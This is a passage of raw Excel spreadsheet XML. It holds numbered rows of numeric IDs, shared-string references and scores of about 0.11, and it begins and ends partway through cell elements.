      </c>
      <c r="E9639" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9639" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9640" ht="15.75" customHeight="1">
      <c r="A9640" s="1">
        <v>19766.0</v>
      </c>
      <c r="B9640" s="2">
        <v>5.6745397E7</v>
      </c>
      <c r="C9640" s="2" t="s">
        <v>9210</v>
      </c>
      <c r="D9640" s="2">
        <v>1.0</v>
      </c>
      <c r="E9640" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9640" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9641" ht="15.75" customHeight="1">
      <c r="A9641" s="1">
        <v>19811.0</v>
      </c>
      <c r="B9641" s="2">
        <v>5.6921097E7</v>
      </c>
      <c r="C9641" s="2" t="s">
        <v>9211</v>
      </c>
      <c r="D9641" s="2">
        <v>1.0</v>
      </c>
      <c r="E9641" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9641" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9642" ht="15.75" customHeight="1">
      <c r="A9642" s="1">
        <v>20282.0</v>
      </c>
      <c r="B9642" s="2">
        <v>1.1168166E7</v>
      </c>
      <c r="C9642" s="2" t="s">
        <v>9212</v>
      </c>
      <c r="D9642" s="2">
        <v>1.0</v>
      </c>
      <c r="E9642" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9642" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9643" ht="15.75" customHeight="1">
      <c r="A9643" s="1">
        <v>20995.0</v>
      </c>
      <c r="B9643" s="2">
        <v>1.7141076E7</v>
      </c>
      <c r="C9643" s="2" t="s">
        <v>9213</v>
      </c>
      <c r="D9643" s="2">
        <v>1.0</v>
      </c>
      <c r="E9643" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9643" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9644" ht="15.75" customHeight="1">
      <c r="A9644" s="1">
        <v>21116.0</v>
      </c>
      <c r="B9644" s="2">
        <v>1.8254544E7</v>
      </c>
      <c r="C9644" s="2" t="s">
        <v>9214</v>
      </c>
      <c r="D9644" s="2">
        <v>1.0</v>
      </c>
      <c r="E9644" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9644" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9645" ht="15.75" customHeight="1">
      <c r="A9645" s="1">
        <v>21642.0</v>
      </c>
      <c r="B9645" s="2">
        <v>2.4724822E7</v>
      </c>
      <c r="C9645" s="2" t="s">
        <v>9215</v>
      </c>
      <c r="D9645" s="2">
        <v>1.0</v>
      </c>
      <c r="E9645" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9645" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9646" ht="15.75" customHeight="1">
      <c r="A9646" s="1">
        <v>21898.0</v>
      </c>
      <c r="B9646" s="2">
        <v>2.784804E7</v>
      </c>
      <c r="C9646" s="2" t="s">
        <v>9216</v>
      </c>
      <c r="D9646" s="2">
        <v>1.0</v>
      </c>
      <c r="E9646" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9646" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9647" ht="15.75" customHeight="1">
      <c r="A9647" s="1">
        <v>21999.0</v>
      </c>
      <c r="B9647" s="2">
        <v>2.9661256E7</v>
      </c>
      <c r="C9647" s="2" t="s">
        <v>9217</v>
      </c>
      <c r="D9647" s="2">
        <v>1.0</v>
      </c>
      <c r="E9647" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9647" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9648" ht="15.75" customHeight="1">
      <c r="A9648" s="1">
        <v>22137.0</v>
      </c>
      <c r="B9648" s="2">
        <v>3.1114166E7</v>
      </c>
      <c r="C9648" s="2" t="s">
        <v>9218</v>
      </c>
      <c r="D9648" s="2">
        <v>1.0</v>
      </c>
      <c r="E9648" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9648" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9649" ht="15.75" customHeight="1">
      <c r="A9649" s="1">
        <v>22537.0</v>
      </c>
      <c r="B9649" s="2">
        <v>3797711.0</v>
      </c>
      <c r="C9649" s="2" t="s">
        <v>9219</v>
      </c>
      <c r="D9649" s="2">
        <v>1.0</v>
      </c>
      <c r="E9649" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9649" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9650" ht="15.75" customHeight="1">
      <c r="A9650" s="1">
        <v>22634.0</v>
      </c>
      <c r="B9650" s="2">
        <v>4.0606488E7</v>
      </c>
      <c r="C9650" s="2" t="s">
        <v>9220</v>
      </c>
      <c r="D9650" s="2">
        <v>1.0</v>
      </c>
      <c r="E9650" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9650" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9651" ht="15.75" customHeight="1">
      <c r="A9651" s="1">
        <v>22746.0</v>
      </c>
      <c r="B9651" s="2">
        <v>4.4304268E7</v>
      </c>
      <c r="C9651" s="2" t="s">
        <v>9221</v>
      </c>
      <c r="D9651" s="2">
        <v>1.0</v>
      </c>
      <c r="E9651" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9651" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9652" ht="15.75" customHeight="1">
      <c r="A9652" s="1">
        <v>23000.0</v>
      </c>
      <c r="B9652" s="2">
        <v>4969662.0</v>
      </c>
      <c r="C9652" s="2" t="s">
        <v>9222</v>
      </c>
      <c r="D9652" s="2">
        <v>1.0</v>
      </c>
      <c r="E9652" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9652" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9653" ht="15.75" customHeight="1">
      <c r="A9653" s="1">
        <v>23007.0</v>
      </c>
      <c r="B9653" s="2">
        <v>4.9801168E7</v>
      </c>
      <c r="C9653" s="2" t="s">
        <v>9223</v>
      </c>
      <c r="D9653" s="2">
        <v>1.0</v>
      </c>
      <c r="E9653" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9653" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9654" ht="15.75" customHeight="1">
      <c r="A9654" s="1">
        <v>23701.0</v>
      </c>
      <c r="B9654" s="2">
        <v>7085832.0</v>
      </c>
      <c r="C9654" s="2" t="s">
        <v>9224</v>
      </c>
      <c r="D9654" s="2">
        <v>1.0</v>
      </c>
      <c r="E9654" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9654" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9655" ht="15.75" customHeight="1">
      <c r="A9655" s="1">
        <v>23744.0</v>
      </c>
      <c r="B9655" s="2">
        <v>7385897.0</v>
      </c>
      <c r="C9655" s="2" t="s">
        <v>9225</v>
      </c>
      <c r="D9655" s="2">
        <v>1.0</v>
      </c>
      <c r="E9655" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9655" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9656" ht="15.75" customHeight="1">
      <c r="A9656" s="1">
        <v>24134.0</v>
      </c>
      <c r="B9656" s="2">
        <v>1.004768E7</v>
      </c>
      <c r="C9656" s="2" t="s">
        <v>9226</v>
      </c>
      <c r="D9656" s="2">
        <v>1.0</v>
      </c>
      <c r="E9656" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9656" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9657" ht="15.75" customHeight="1">
      <c r="A9657" s="1">
        <v>24222.0</v>
      </c>
      <c r="B9657" s="2">
        <v>1.0424818E7</v>
      </c>
      <c r="C9657" s="2" t="s">
        <v>9227</v>
      </c>
      <c r="D9657" s="2">
        <v>1.0</v>
      </c>
      <c r="E9657" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9657" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9658" ht="15.75" customHeight="1">
      <c r="A9658" s="1">
        <v>24320.0</v>
      </c>
      <c r="B9658" s="2">
        <v>1.0620503E7</v>
      </c>
      <c r="C9658" s="2" t="s">
        <v>9228</v>
      </c>
      <c r="D9658" s="2">
        <v>1.0</v>
      </c>
      <c r="E9658" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9658" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9659" ht="15.75" customHeight="1">
      <c r="A9659" s="1">
        <v>25720.0</v>
      </c>
      <c r="B9659" s="2">
        <v>1.4541546E7</v>
      </c>
      <c r="C9659" s="2" t="s">
        <v>9229</v>
      </c>
      <c r="D9659" s="2">
        <v>1.0</v>
      </c>
      <c r="E9659" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9659" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9660" ht="15.75" customHeight="1">
      <c r="A9660" s="1">
        <v>25843.0</v>
      </c>
      <c r="B9660" s="2">
        <v>1.4798954E7</v>
      </c>
      <c r="C9660" s="2" t="s">
        <v>9230</v>
      </c>
      <c r="D9660" s="2">
        <v>1.0</v>
      </c>
      <c r="E9660" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9660" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9661" ht="15.75" customHeight="1">
      <c r="A9661" s="1">
        <v>26456.0</v>
      </c>
      <c r="B9661" s="2">
        <v>1.731204E7</v>
      </c>
      <c r="C9661" s="2" t="s">
        <v>9231</v>
      </c>
      <c r="D9661" s="2">
        <v>1.0</v>
      </c>
      <c r="E9661" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9661" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9662" ht="15.75" customHeight="1">
      <c r="A9662" s="1">
        <v>26948.0</v>
      </c>
      <c r="B9662" s="2">
        <v>1.9591142E7</v>
      </c>
      <c r="C9662" s="2" t="s">
        <v>9232</v>
      </c>
      <c r="D9662" s="2">
        <v>1.0</v>
      </c>
      <c r="E9662" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9662" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9663" ht="15.75" customHeight="1">
      <c r="A9663" s="1">
        <v>27470.0</v>
      </c>
      <c r="B9663" s="2">
        <v>2.1988222E7</v>
      </c>
      <c r="C9663" s="2" t="s">
        <v>9233</v>
      </c>
      <c r="D9663" s="2">
        <v>1.0</v>
      </c>
      <c r="E9663" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9663" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9664" ht="15.75" customHeight="1">
      <c r="A9664" s="1">
        <v>27720.0</v>
      </c>
      <c r="B9664" s="2">
        <v>2.3061455E7</v>
      </c>
      <c r="C9664" s="2" t="s">
        <v>9234</v>
      </c>
      <c r="D9664" s="2">
        <v>1.0</v>
      </c>
      <c r="E9664" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9664" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9665" ht="15.75" customHeight="1">
      <c r="A9665" s="1">
        <v>27987.0</v>
      </c>
      <c r="B9665" s="2">
        <v>2.4057955E7</v>
      </c>
      <c r="C9665" s="2" t="s">
        <v>9235</v>
      </c>
      <c r="D9665" s="2">
        <v>1.0</v>
      </c>
      <c r="E9665" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9665" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9666" ht="15.75" customHeight="1">
      <c r="A9666" s="1">
        <v>28002.0</v>
      </c>
      <c r="B9666" s="2">
        <v>2.4324114E7</v>
      </c>
      <c r="C9666" s="2" t="s">
        <v>9236</v>
      </c>
      <c r="D9666" s="2">
        <v>1.0</v>
      </c>
      <c r="E9666" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9666" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9667" ht="15.75" customHeight="1">
      <c r="A9667" s="1">
        <v>28057.0</v>
      </c>
      <c r="B9667" s="2">
        <v>2.4573706E7</v>
      </c>
      <c r="C9667" s="2" t="s">
        <v>9237</v>
      </c>
      <c r="D9667" s="2">
        <v>1.0</v>
      </c>
      <c r="E9667" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9667" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9668" ht="15.75" customHeight="1">
      <c r="A9668" s="1">
        <v>28127.0</v>
      </c>
      <c r="B9668" s="2">
        <v>2.472398E7</v>
      </c>
      <c r="C9668" s="2" t="s">
        <v>9238</v>
      </c>
      <c r="D9668" s="2">
        <v>1.0</v>
      </c>
      <c r="E9668" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9668" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9669" ht="15.75" customHeight="1">
      <c r="A9669" s="1">
        <v>28655.0</v>
      </c>
      <c r="B9669" s="2">
        <v>2.7358686E7</v>
      </c>
      <c r="C9669" s="2" t="s">
        <v>9239</v>
      </c>
      <c r="D9669" s="2">
        <v>1.0</v>
      </c>
      <c r="E9669" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9669" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9670" ht="15.75" customHeight="1">
      <c r="A9670" s="1">
        <v>28717.0</v>
      </c>
      <c r="B9670" s="2">
        <v>2.7848039E7</v>
      </c>
      <c r="C9670" s="2" t="s">
        <v>9216</v>
      </c>
      <c r="D9670" s="2">
        <v>1.0</v>
      </c>
      <c r="E9670" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9670" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9671" ht="15.75" customHeight="1">
      <c r="A9671" s="1">
        <v>29060.0</v>
      </c>
      <c r="B9671" s="2">
        <v>3.0256309E7</v>
      </c>
      <c r="C9671" s="2" t="s">
        <v>9240</v>
      </c>
      <c r="D9671" s="2">
        <v>1.0</v>
      </c>
      <c r="E9671" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9671" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9672" ht="15.75" customHeight="1">
      <c r="A9672" s="1">
        <v>29757.0</v>
      </c>
      <c r="B9672" s="2">
        <v>3.4782969E7</v>
      </c>
      <c r="C9672" s="2" t="s">
        <v>8852</v>
      </c>
      <c r="D9672" s="2">
        <v>1.0</v>
      </c>
      <c r="E9672" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9672" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9673" ht="15.75" customHeight="1">
      <c r="A9673" s="1">
        <v>30148.0</v>
      </c>
      <c r="B9673" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C9673" s="2" t="s">
        <v>9241</v>
      </c>
      <c r="D9673" s="2">
        <v>1.0</v>
      </c>
      <c r="E9673" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9673" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9674" ht="15.75" customHeight="1">
      <c r="A9674" s="1">
        <v>30760.0</v>
      </c>
      <c r="B9674" s="2">
        <v>4.4304267E7</v>
      </c>
      <c r="C9674" s="2" t="s">
        <v>9221</v>
      </c>
      <c r="D9674" s="2">
        <v>1.0</v>
      </c>
      <c r="E9674" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9674" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9675" ht="15.75" customHeight="1">
      <c r="A9675" s="1">
        <v>30775.0</v>
      </c>
      <c r="B9675" s="2">
        <v>4.464871E7</v>
      </c>
      <c r="C9675" s="2" t="s">
        <v>9242</v>
      </c>
      <c r="D9675" s="2">
        <v>1.0</v>
      </c>
      <c r="E9675" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9675" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9676" ht="15.75" customHeight="1">
      <c r="A9676" s="1">
        <v>30823.0</v>
      </c>
      <c r="B9676" s="2">
        <v>4.5376842E7</v>
      </c>
      <c r="C9676" s="2" t="s">
        <v>9243</v>
      </c>
      <c r="D9676" s="2">
        <v>1.0</v>
      </c>
      <c r="E9676" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9676" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9677" ht="15.75" customHeight="1">
      <c r="A9677" s="1">
        <v>30824.0</v>
      </c>
      <c r="B9677" s="2">
        <v>4541322.0</v>
      </c>
      <c r="C9677" s="2" t="s">
        <v>9244</v>
      </c>
      <c r="D9677" s="2">
        <v>1.0</v>
      </c>
      <c r="E9677" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9677" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9678" ht="15.75" customHeight="1">
      <c r="A9678" s="1">
        <v>32396.0</v>
      </c>
      <c r="B9678" s="2">
        <v>5627572.0</v>
      </c>
      <c r="C9678" s="2" t="s">
        <v>9245</v>
      </c>
      <c r="D9678" s="2">
        <v>1.0</v>
      </c>
      <c r="E9678" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9678" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9679" ht="15.75" customHeight="1">
      <c r="A9679" s="1">
        <v>33114.0</v>
      </c>
      <c r="B9679" s="2">
        <v>6967450.0</v>
      </c>
      <c r="C9679" s="2" t="s">
        <v>9246</v>
      </c>
      <c r="D9679" s="2">
        <v>1.0</v>
      </c>
      <c r="E9679" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9679" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9680" ht="15.75" customHeight="1">
      <c r="A9680" s="1">
        <v>33258.0</v>
      </c>
      <c r="B9680" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C9680" s="2" t="s">
        <v>9247</v>
      </c>
      <c r="D9680" s="2">
        <v>1.0</v>
      </c>
      <c r="E9680" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9680" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9681" ht="15.75" customHeight="1">
      <c r="A9681" s="1">
        <v>33512.0</v>
      </c>
      <c r="B9681" s="2">
        <v>8080533.0</v>
      </c>
      <c r="C9681" s="2" t="s">
        <v>9248</v>
      </c>
      <c r="D9681" s="2">
        <v>1.0</v>
      </c>
      <c r="E9681" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9681" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9682" ht="15.75" customHeight="1">
      <c r="A9682" s="1">
        <v>34043.0</v>
      </c>
      <c r="B9682" s="2">
        <v>9576998.0</v>
      </c>
      <c r="C9682" s="2" t="s">
        <v>9249</v>
      </c>
      <c r="D9682" s="2">
        <v>1.0</v>
      </c>
      <c r="E9682" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9682" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9683" ht="15.75" customHeight="1">
      <c r="A9683" s="1">
        <v>34224.0</v>
      </c>
      <c r="B9683" s="2">
        <v>4.5154132E7</v>
      </c>
      <c r="C9683" s="2" t="s">
        <v>9250</v>
      </c>
      <c r="D9683" s="2">
        <v>1.0</v>
      </c>
      <c r="E9683" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9683" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9684" ht="15.75" customHeight="1">
      <c r="A9684" s="1">
        <v>620.0</v>
      </c>
      <c r="B9684" s="2">
        <v>1.9509238E7</v>
      </c>
      <c r="C9684" s="2" t="s">
        <v>9251</v>
      </c>
      <c r="D9684" s="2">
        <v>1.0</v>
      </c>
      <c r="E9684" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9684" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9685" ht="15.75" customHeight="1">
      <c r="A9685" s="1">
        <v>2068.0</v>
      </c>
      <c r="B9685" s="2">
        <v>3.1091522E7</v>
      </c>
      <c r="C9685" s="2" t="s">
        <v>9252</v>
      </c>
      <c r="D9685" s="2">
        <v>1.0</v>
      </c>
      <c r="E9685" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9685" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9686" ht="15.75" customHeight="1">
      <c r="A9686" s="1">
        <v>2161.0</v>
      </c>
      <c r="B9686" s="2">
        <v>3.1749996E7</v>
      </c>
      <c r="C9686" s="2" t="s">
        <v>9253</v>
      </c>
      <c r="D9686" s="2">
        <v>1.0</v>
      </c>
      <c r="E9686" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9686" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9687" ht="15.75" customHeight="1">
      <c r="A9687" s="1">
        <v>2502.0</v>
      </c>
      <c r="B9687" s="2">
        <v>3.393992E7</v>
      </c>
      <c r="C9687" s="2" t="s">
        <v>9254</v>
      </c>
      <c r="D9687" s="2">
        <v>1.0</v>
      </c>
      <c r="E9687" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9687" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9688" ht="15.75" customHeight="1">
      <c r="A9688" s="1">
        <v>3479.0</v>
      </c>
      <c r="B9688" s="2">
        <v>3.8402642E7</v>
      </c>
      <c r="C9688" s="2" t="s">
        <v>9255</v>
      </c>
      <c r="D9688" s="2">
        <v>1.0</v>
      </c>
      <c r="E9688" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9688" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9689" ht="15.75" customHeight="1">
      <c r="A9689" s="1">
        <v>4549.0</v>
      </c>
      <c r="B9689" s="2">
        <v>4.2683967E7</v>
      </c>
      <c r="C9689" s="2" t="s">
        <v>9256</v>
      </c>
      <c r="D9689" s="2">
        <v>1.0</v>
      </c>
      <c r="E9689" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9689" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9690" ht="15.75" customHeight="1">
      <c r="A9690" s="1">
        <v>6131.0</v>
      </c>
      <c r="B9690" s="2">
        <v>4.7801501E7</v>
      </c>
      <c r="C9690" s="2" t="s">
        <v>9257</v>
      </c>
      <c r="D9690" s="2">
        <v>1.0</v>
      </c>
      <c r="E9690" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9690" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9691" ht="15.75" customHeight="1">
      <c r="A9691" s="1">
        <v>6699.0</v>
      </c>
      <c r="B9691" s="2">
        <v>4.919929E7</v>
      </c>
      <c r="C9691" s="2" t="s">
        <v>9258</v>
      </c>
      <c r="D9691" s="2">
        <v>1.0</v>
      </c>
      <c r="E9691" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9691" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9692" ht="15.75" customHeight="1">
      <c r="A9692" s="1">
        <v>6864.0</v>
      </c>
      <c r="B9692" s="2">
        <v>4.9678512E7</v>
      </c>
      <c r="C9692" s="2" t="s">
        <v>9259</v>
      </c>
      <c r="D9692" s="2">
        <v>1.0</v>
      </c>
      <c r="E9692" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9692" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9693" ht="15.75" customHeight="1">
      <c r="A9693" s="1">
        <v>7738.0</v>
      </c>
      <c r="B9693" s="2">
        <v>5.204867E7</v>
      </c>
      <c r="C9693" s="2" t="s">
        <v>9260</v>
      </c>
      <c r="D9693" s="2">
        <v>1.0</v>
      </c>
      <c r="E9693" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9693" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9694" ht="15.75" customHeight="1">
      <c r="A9694" s="1">
        <v>8019.0</v>
      </c>
      <c r="B9694" s="2">
        <v>5.2800118E7</v>
      </c>
      <c r="C9694" s="2" t="s">
        <v>9261</v>
      </c>
      <c r="D9694" s="2">
        <v>1.0</v>
      </c>
      <c r="E9694" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9694" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9695" ht="15.75" customHeight="1">
      <c r="A9695" s="1">
        <v>10321.0</v>
      </c>
      <c r="B9695" s="2">
        <v>5.7704919E7</v>
      </c>
      <c r="C9695" s="2" t="s">
        <v>9262</v>
      </c>
      <c r="D9695" s="2">
        <v>1.0</v>
      </c>
      <c r="E9695" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9695" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9696" ht="15.75" customHeight="1">
      <c r="A9696" s="1">
        <v>10516.0</v>
      </c>
      <c r="B9696" s="2">
        <v>1.1814396E7</v>
      </c>
      <c r="C9696" s="2" t="s">
        <v>9263</v>
      </c>
      <c r="D9696" s="2">
        <v>1.0</v>
      </c>
      <c r="E9696" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9696" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9697" ht="15.75" customHeight="1">
      <c r="A9697" s="1">
        <v>10891.0</v>
      </c>
      <c r="B9697" s="2">
        <v>1.6567933E7</v>
      </c>
      <c r="C9697" s="2" t="s">
        <v>9264</v>
      </c>
      <c r="D9697" s="2">
        <v>1.0</v>
      </c>
      <c r="E9697" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9697" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9698" ht="15.75" customHeight="1">
      <c r="A9698" s="1">
        <v>11297.0</v>
      </c>
      <c r="B9698" s="2">
        <v>2.0960703E7</v>
      </c>
      <c r="C9698" s="2" t="s">
        <v>9265</v>
      </c>
      <c r="D9698" s="2">
        <v>1.0</v>
      </c>
      <c r="E9698" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9698" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9699" ht="15.75" customHeight="1">
      <c r="A9699" s="1">
        <v>11405.0</v>
      </c>
      <c r="B9699" s="2">
        <v>2.163886E7</v>
      </c>
      <c r="C9699" s="2" t="s">
        <v>9266</v>
      </c>
      <c r="D9699" s="2">
        <v>1.0</v>
      </c>
      <c r="E9699" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9699" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9700" ht="15.75" customHeight="1">
      <c r="A9700" s="1">
        <v>12855.0</v>
      </c>
      <c r="B9700" s="2">
        <v>3.1842588E7</v>
      </c>
      <c r="C9700" s="2" t="s">
        <v>9267</v>
      </c>
      <c r="D9700" s="2">
        <v>1.0</v>
      </c>
      <c r="E9700" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9700" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9701" ht="15.75" customHeight="1">
      <c r="A9701" s="1">
        <v>12868.0</v>
      </c>
      <c r="B9701" s="2">
        <v>3.1905403E7</v>
      </c>
      <c r="C9701" s="2" t="s">
        <v>9268</v>
      </c>
      <c r="D9701" s="2">
        <v>1.0</v>
      </c>
      <c r="E9701" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9701" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9702" ht="15.75" customHeight="1">
      <c r="A9702" s="1">
        <v>12869.0</v>
      </c>
      <c r="B9702" s="2">
        <v>3.1917971E7</v>
      </c>
      <c r="C9702" s="2" t="s">
        <v>9269</v>
      </c>
      <c r="D9702" s="2">
        <v>1.0</v>
      </c>
      <c r="E9702" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9702" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9703" ht="15.75" customHeight="1">
      <c r="A9703" s="1">
        <v>13019.0</v>
      </c>
      <c r="B9703" s="2">
        <v>3.2936999E7</v>
      </c>
      <c r="C9703" s="2" t="s">
        <v>9270</v>
      </c>
      <c r="D9703" s="2">
        <v>1.0</v>
      </c>
      <c r="E9703" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9703" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9704" ht="15.75" customHeight="1">
      <c r="A9704" s="1">
        <v>13456.0</v>
      </c>
      <c r="B9704" s="2">
        <v>3.518977E7</v>
      </c>
      <c r="C9704" s="2" t="s">
        <v>9271</v>
      </c>
      <c r="D9704" s="2">
        <v>1.0</v>
      </c>
      <c r="E9704" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9704" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9705" ht="15.75" customHeight="1">
      <c r="A9705" s="1">
        <v>15261.0</v>
      </c>
      <c r="B9705" s="2">
        <v>4.2306883E7</v>
      </c>
      <c r="C9705" s="2" t="s">
        <v>9272</v>
      </c>
      <c r="D9705" s="2">
        <v>1.0</v>
      </c>
      <c r="E9705" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9705" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9706" ht="15.75" customHeight="1">
      <c r="A9706" s="1">
        <v>15834.0</v>
      </c>
      <c r="B9706" s="2">
        <v>4.4347343E7</v>
      </c>
      <c r="C9706" s="2" t="s">
        <v>9273</v>
      </c>
      <c r="D9706" s="2">
        <v>1.0</v>
      </c>
      <c r="E9706" s="3" t="s">
